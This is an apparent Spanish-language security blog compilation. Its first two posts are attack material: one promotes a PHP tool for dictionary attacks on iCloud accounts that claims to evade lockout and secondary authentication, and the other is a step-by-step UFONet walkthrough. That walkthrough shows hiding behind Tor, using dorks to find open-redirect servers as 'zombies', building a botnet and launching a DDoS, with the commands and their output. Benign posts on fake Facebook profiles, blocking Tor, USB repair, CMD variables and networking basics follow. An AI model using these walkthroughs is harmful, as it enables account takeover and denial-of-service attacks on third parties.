Herramienta para obtener contraseñas de usuarios Icloud

Un pequeño proyecto en Github con una herramienta en php para realizar ataques de diccionario contra IDs de iCloud de Apple, evadiendo las restricciones de bloqueo de cuentas y autenticación secundaria en cualquier cuenta.

Para usarlo simplemente hay que descargar y descomprimir la carpeta en el htdocs del servidor web (probado en XAMP) e instalar CURL en tu SO.

No olvides también habilitar la extensión CURL descomentando la siguiente línea en tu fichero php.ini:

;extension=php_curl.dll

Después ve a http://127.0.0.1/iDict/ en tu navegador web (preferiblemente Firefox, Chrome o Safari).

Wordlist.txt es de iBrute y satisface los requisitos de contraseña de iCloud 

Su autor y por supuesto también nosotros no se hacen responsables de su uso (comprueba las restricciones de tu país).

https://github.com/Pilfer/iDictPy


Game Over: iCloud hole closed following brute force attack http://ow.ly/GTaib 

Ataque DDOS 2015

UFONET es una herramienta de código abierto con licencia GPLv3, escrita por Lord Epsylon (psy) en python, html5 y javascript, para realizar ataques de denegación distribuídos (DDoS) aprovechando fallos de redirecciones abiertas (open redirect) en aplicaciones web de terceros, a modo de botnet.

Una vulnerabilidad Open Redirect es una vulnerabilidad que permite al atacante realizar una redirección arbitraria, debido fundamentalmente a que el aplicativo web delega la redirección en una variable controlada por el usuario. UFONet es capaz de buscar en Google y recopilar una buena lista de aplicaciones web vulnerables a Open Redirect ("zombies") para luego utilizarlas cuando se quiera atacar a un objetivo redireccionando el tráfico de forma masiva mediante estas redirecciones.

La herramienta funciona en Linux, Windows, OSX..., en cualquier sistema con Python (~2.7.x) y python-pycurl:


apt-get install python-pycurl

En esta entrada vamos a hacer una serie de pruebas bajo Kali Linux con la release v0.5b - Invasion! que se publicó hace menos de una semana y que adicionalmente permite multithreading, corrige bugs y añade estadísticas generales y de bots.

Primero clonanos el repositorio de GitHub:

git clone https://github.com/epsylon/ufonet

Antes de empezar, suele ser recomendable mantener cierto grado de anonimato mediante Tor:

python ufonet --check-tor

==================================================================

888     888 8888888888 .d88888b.  888b    888          888    
888     888 888        d88P Y888b 8888b   888          888    
888     888 888       888     888 88888b  888          888    
888     888 8888888   888     888 888Y88b 888  .d88b.  888888 
888     888 888       888     888 888 Y88b888 d8P  Y8b 888    
888     888 888       888     888 888  Y88888 88888888 888    
Y88b. .d88P 888       Y88b. .d88P 888   Y8888 Y8b.     Y88b.  
 'Y88888P'  888        'Y88888P'  888    Y888  'Y8888   'Y8888



UFONet - DDoS attacks via Web Abuse - by Psy


===========================================================================

Sending request to: https://check.torproject.org 

It seems that Tor is not properly set. 

Your IP address appears to be: X.X.X.12 

¡Ups! Hay que remediarlo:

apt-get install vidalia privoxy 
service tor start 
echo "forward-socks5 / 127.0.0.1:9050 ." >> /etc/privoxy/config 
service privoxy start

root@kali:~# curl --socks5 127.0.0.1:9050 curlmyip.com 
89.31.X.5 
root@kali:~/ufonet/ufonet# curl -x 127.0.0.1:8118 curlmyip.com 
185.X.37.158 

Una vez que tenemos cubiertas las espaldas, empezaremos a buscar en Internet servidores web vulnerables a Open Redirect. Podemos indicar un fichero donde tenemos todos los dorks:

root@kali:~/ufonet/ufonet# cat dorks.txt 

proxy.php?url=

check.cgi?url=

checklink?uri=

validator?uri=

horde/util/go.php?url=

mobiquo/mobiquo.php?referer=

wp-content/themes/dt-chocolate/like_window.php?image=

wp-content/plugins/age-verification/age-verification.php?redirect_to=

gotoURL.asp?url=

root@kali:~/ufonet/ufonet# ./ufonet -v --sd=dorks.txt --proxy="http://127.0.0.1:8118"

O especificar uno como parámetro:

root@kali:~/ufonet/ufonet# ./ufonet -v -s 'proxy.php?url=' --proxy="http://127.0.0.1:8118"

Searching for 'zombies' on google results. Good Luck ;-)

======================

Query used: https://www.google.com/xhtml?q=inurl%3A%22proxy.php%3Furl%3D%22&start=0&num=10&gws_rd=ssl

+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

+Victim found: http://servidor/blog/wp-content/plugins/google-document-embedder/proxy.php?url=

------------

+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

+Victim found: http://servidor/CPnets/proxy.php?url=

------------

+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

======================

+Possible Zombies: 6

======================

Bien! parece que hemos encontrado en Google los primeros candidatos a convertirse en nuestros particulares zombies. Pero tenemos que comprobar si realmente están "vivos" (ironía++) y son realmente vulnerables:

Wanna check if they are valid zombies? (Y/n)
Y
Are 'they' alive? :-) (HEAD Check):
===================================
Trying: 6
---------------------
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
Reply:
...
=========================================

[Control] All zombies returned to the master ;-)
---------------------
Zombie: www.victima.com
Status: Ok [200]
----------
...

==================
OK: 5 Fail: 1
==================
======================
Checking for payloads:
======================
Trying: 5
---------------------
Reply:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

No está nada mal, 5 de 6! Pues hay que "alistarlos" e incorporarlos a nuestro ejército de bots:

[Control] All zombies returned to the master ;-)
---------------------
Vector: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
Status: Not ready...
----------
Vector: http://servidor/CPnets/proxy.php?url=
Status: Waiting your orders...
----------
Vector: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
Status: Waiting your orders...
----------
Vector: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
Status: Not ready...
----------
Vector: http://servidor/blog/wp-content/plugins/google-document-embedder/proxy.php?url=
Status: Not ready...
----------
==================
OK: 2 Fail: 3
==================
==================
Army of 'zombies'
==================
Zombie [ 1 ]: servidor1
Zombie [ 2 ]: servidor2
------------------
Total Army: 2
------------------
Wanna update your army (Y/n)Y
-------------------------

[INFO] - Botnet updated! ;-) 

Ahora llega el momento de seleccionar un objetivo para realizar el ataque DDoS. Primero inspeccionaremos la URL de la víctima (crawling)  para ver cual es el objeto de mayor tamaño y poder realizar un ataque más efectivo:

root@kali:~/ufonet/ufonet# ./ufonet -v -i http://target.com  --proxy="http://127.0.0.1:8118"

...

Inspecting target's component sizes to search for better places to 'bit'... Grrr!

======================

+Style (.css) found: css/ie.css
(Size: 2607 Bytes)
------------
================================================================================
=Biggest File: http://servidor/css/ie.css
================================================================================

Y finalmente, lanzamos el ataque con los parámetros correspondientes:

     + con verbose:     ./ufonet -a http://target.com -r 10 -v
     + con proxy TOR:   ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
     + especificando url:     ./ufonet -a http://target.com -r 10 -b "/css/ie.css"
     + cpn threads:     ./ufonet -a http://target.com -r 10 --threads 50

...

Total invocations: 30 | Zombies: 3 | Hits: 30 | Fails: 0
Total time: 0:00:33.577397 | Avg time: 0:00:01.119247
Total size: 147.8KiB | Avg size: 4.9KiB

=====================
[INFO] - Attack completed! ;-)
=====================

Como detectar un perfil falso en Facebook

¿A quién no le ha llegado una invitación en Facebook de un chico o chica (normalmente del extranjero), cuya foto suele ser bastante sugerente? ¿Nunca te has pensado quién es y para qué querrá ser mi amigo o amiga en Facebook? Si no te las hecho nunca en estos casos, es hora de que lo vayas haciendo. La respuesta es muy sencilla, puede ser un perfil falso en Facebook.
En la mayoría de los casos, salvo que te hayas ido de Erasmus y hayas tenido mucho éxito, se trata de un perfil falso que intenta ganarse tu confianza, añadiéndolo como amigo/a. Una vez ganado tu confianza, de forma automatizada tendrán lugar una serie de “ataques” de phishing, scam o invitación de aplicaciones maliciosas con el objetivo de provocar algún tipo de infección en tu equipo, robarte la cuenta Facebook o usarte para realizar algún tipo de transacción de dudosa legitimidad.
Una vez alertados sobre esta posibilidad, os voy a explicar una forma muy sencilla de detectar un perfil falso en Facebook. Para ello vamos a utilizar la foto de perfil del presunto perfil falso y a Google. Como se suele decir, Internet pone el problema, Google la solución (todavía estoy esperando alguna gratificación por parte de Google por la publicidad que le hago ;-).
Veamos un ejemplo: resulta que recibo la siguiente invitación de una tal Rosalind Booth que quiere ser mi amiga. Por el nombre, deduzco rápidamente que no es de Cádiz, así que empiezo a sospechar. Pasemos a ver su foto de perfil

¿Tú también sospecharías verdad? Haces bien.

El siguiente paso es guardar la foto de su perfil, por ejemplo en el escritorio. Y ahora es cuando Google Imágenes entra en acción.

Abrimos Google > Imágenes y arrastramos la foto del perfil de nuestra “amiga” Rosalind al cuadro de texto de búsqueda de Google Imágenes, de la siguiente forma:

OK, ahora veamos los resultados de búsqueda de esta imagen.

Vaya! Parece que nuestra amiga Rosalind, también es conocida como Felita Grath, Raynell Fillmore y Alexis Rubin entre otras. Ha quedado claro que la foto del perfil se ha usado para muchos otros perfiles de Facebook y obviamente falsos.

Espero que no confien mucho en personas que no conocen en Facebook por que muchos se hacen pasar por personas falsas!

Bloquear Accesos en TOR

Muchas o mejor dicho miles de veces oímos hablar de la red TOR. Ya no es un término usado por gurús de la seguridad sino que más o menos es conocido por los aficionados a la informática.
Hay mucha suspicacia en el tema del anonimato en la red y obviamente esto tiene sus motivos. Pero tanto positivos como negativos.
Cuando hablamos de anonimizar tu conexión para que no te “espíen” podemos suponer que ya de hecho vamos a cometer un delito o vamos a practicar actividades de dudosa legalidad. Esto es muy relativo.
Pero como primera premisa, indiscutible es que nadie tiene porque espiar tu actividad en la red. Podemos entrar en el debate de que se sospecha o se tiene indicios de que “tal” y “cual” pero un usuario de “a pie” no tiene por qué ser rastreado.
Con eso, se podría justificar el uso de TOR. Evitar que nadie te rastree o al menos ponérselo difícil.
Otro punto positivo y útil es evitar la censura en determinados países tanto dictatoriales como falsas democracias que atentan sin pudor ninguno, contra la privacidad y la libertad de expresión de sus ciudadanos.
Visto así podemos dilucidar un aspecto muy positivo del uso de TOR. Pero ¿Y si es para cometer delitos premeditados?
Obviamente es su parte mala. El símil de la navaja es muy gráfico. Todos tenemos acceso a navajas y podemos usarla para pelar naranjas, cortar alimentos, etcétera…pero también puede ser usada para hurtos, agresiones, etcétera…
TOR es lo mismo aplicado al anonimato.

Aspectos de seguridad

Muchas veces nos centramos en proteger nuestra Web de ataques SQLi, cerrar puertos, etcétera… pero olvidamos acciones básicas que pueden evitarnos muchos dolores de cabeza al igual que MB en los logs de nuestros servidores.
La mayoría de sitios Webs y servidores que auditamos son accesibles desde la red TOR, ¿en serio queremos que accedan desde la red TOR?¿Es necesario?
Evidentemente si somos una Web de derechos humanos o relacionada con las libertades y derechos de las personas esto no sería recomendado puesto que estaríamos “taponando” la comunicación con seres humanos represaliados.

Bloqueando accesos desde TOR

Como recuperar un USB dañado

Muchas veces nos pasa, un USB acaba dando problemas cuando llega al punto que no podemos añadir archivos e incluso no se puede ni formatear, antes de botarlo o desecharlo podemos probar lo siguiente(CON ESTPS PROCESOS PERDEREMOS LOS DATOS ALMACENADOS PERO RECUPERAREMOS EL USB)
Entramos a CMD con permisos de ADMINISTRADOR
Escribimos diskpart
Hacemos LIST DISK y elegimos el disco referente al pendrive con SELECT DISK 3 (siendo 3 el número del pendrive)
CLEAN
CREATE PARTITION PRIMARY
ACTIVE
FORMAT fs=fat32 quick
ASSIGN
EXIT

Sustitución de Variables en MSDOS (CMD)

Aun estando en el año 2015, siguen existiendo situaciones en las que resulta necesario apoyarse en ficheros de comandos (CMD) de MSDOS, por ejemplo, para planificar ejecuciones de SQLCMDs utilizando el Planificador de Tareas de Windows en máquinas con SQL Express, donde no podemos recurrir al Agente de SQL Server. Situaciones poco comunes, pero que desafortunadamente continúan produciéndose (puntualmente) por motivos variopintos. En el presente artículo presentamos la Sustitución de Variables en ficheros de comandos (CMD) de MSDOS, un recurso que en estos casos nos resultará de gran utilidad.

Hay muchas situaciones en las que podemos necesitar variable de sustitución en nuestros Scripts o ficheros de comandos de MSDOS (CMD), que como administradores de Bases de Datos, nos pueden facilitar la ejecución de ficheros SQL a través de SQLCMD. Un ejemplo típico, es definir un nombre de fichero utilizando como prefijo la fecha y hora actual, que nos puede servir para dejar un histórico de ejecuciones a modo de Log.

Utilizaremos la palabra reservada SET para definir una variable y asignarle un valor. Igualmente, utilizaremos el símbolo % para indicar o delimitar nuestras sustituciones. Por ejemplo:

set fulldate=%date% Asigna la fecha actual a la variable fulldate.
set year=%date:~6,4% Asigna el año actual a la variable year, para lo cual, coge 4 caracteres a partir de la posición sexta (ojo, que la configuración regional/formato de fecha nos condiciona la posición en la que se encuentra el año).
set filename=%year%%month%%day%_logfile.log Asigna la concatenación de varias variables y una constante a la variable filename.
Estos son unos sencillos trucos que nos pueden ayudar a escribir sencillos Scripts de MSDOS, de una forma más legible y mantenible. A continuación se puede observar un ejemplo más completo:
A continuación se muestra la salida de ejecución del script anterior.Poco más por hoy. Como siempre, confío que la lectura resulte de interés.

Introducción a la Interconexión de Redes

Este primer capítulo muestra una introducción al Modelo Jerárquico de Red, al Modelo de Referencia OSI, a las Funciones de la Capa Física , a las Funciones de la Capa de Enlace, a las Funciones de la Capa de Red (o de Internet), a las Funciones de la Capa de Transporte, y finalmente, se introduce en la importancia de la apropiada selección de dispositivos Cisco. Los conceptos aquí mostrados son introductorios y muy básicos. Sin embargo, es de vital importancia su comprensión para poder seguir abarcando el resto de contenidos del presente Manual Cisco CCNA. De momento, empezamos sólo con la teoría.

Las Redes Corporativas actuales

Las redes actuales tienden todas a seguir un mismo modelo de internetworking formado por una oficina central, y distintas conexiones a esta, realizadas por sucursales, teletrabajadores, usuarios móviles, partners, etc.

Oficina Principal. Aquella dónde se encuentra la mayoría de los usuarios, servidores (CPD - Centro de Proceso de Datos), e información corporativo, habitualmente conectados a una LAN perteneciente a un backbone de alta velocidad.

Sucursales. Oficinas remotas dónde trabajan grupos más reducidos de personas, que necesitan disfrutar de los servicios de la oficina principal, conectándose mediante enlaces WAN permanentes o de marcado a petición.

Teletrabajadores. Empleados que trabajan desde sus domicilios, requiriendo generalmente conexiones puntuales (marcado a petición) con la oficina principal y/o la sucursal.

Usuarios móviles y Partners. Individuos o empresas que disfrutan de algnos servicios de la oficina principal y/o sucursal, desde distintas ubicaciones.

En todos estos casos, el factor común suele ser Internet, que suele también utilizarse para intercomunicarse, ya sea punto a punto o a través de redes privadas virtuales (VPN).